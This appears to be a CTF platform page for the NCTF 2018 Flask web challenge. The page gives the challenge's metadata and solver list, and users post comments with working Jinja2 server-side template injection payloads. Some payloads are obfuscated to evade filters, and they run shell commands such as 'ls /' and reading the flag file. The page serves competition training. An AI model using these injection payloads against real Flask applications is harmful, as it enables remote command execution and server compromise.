Flask PLUSWEB 未解决

分数: 0 金币: 0
所属赛事: NCTF 2018
题目作者: 未知
一  血: harry
一血奖励: 0金币
解  决: 61
提  示:
描  述:
yulige你又写bug了!
评论
不会编程的崽 1月前

%7B%7B''['__cl'+'ass__']['__ba'+'ses__'][0]['__subc'+'lasses__']()[218]['__in'+'it__']['__glo'+'bals__']['__bu'+'iltins__']['__imp'+'ort__']('o''s')['po''pen']('cat%20/Th1s_is__F1114g').read()%7D%7D

回复 0

minhaf 10月前

{{''["__ssalc__"[::-1]]["__esab__"[::-1]]["__sessalcbus__"[::-1]]()[223]('cat /Th1s_is__F1114g',shell=True,stdout=-1).communicate()[0].strip()}}

回复 0

希卡利 1年前

ssti模板注入,先试试{{7*7}},输出49就是有,再输入{{lipsum.__globals__['o''s']['pop''en']('ls /').read()}}就看到flag了

回复 0

2728462336 2年前

简单的SSTI模板注入

回复 0

WriteUp

image
sean

2 金币

评分(0)

暂无评分

解题动态

sjjf 攻破了该题 2天前
温吞世俗人间烟火 攻破了该题 14天前
不会编程的崽 攻破了该题 1月前
mjh111 攻破了该题 1月前
forces 攻破了该题 2月前
tcqctf 攻破了该题 2月前
t1tl3d 攻破了该题 3月前
nuxe 攻破了该题 5月前
ljt1016 攻破了该题 6月前
nakanodarling 攻破了该题 6月前
3229722202 攻破了该题 6月前
kaiyafanfan123 攻破了该题 6月前
kingmaster123 攻破了该题 7月前
花舞Flower 攻破了该题 7月前
minhaf 攻破了该题 10月前
倦鸟叫了一整天 攻破了该题 11月前
tianna 攻破了该题 11月前
111lsg 攻破了该题 11月前
wcsndm 攻破了该题 11月前
coldplay99999 攻破了该题 12月前
问题反馈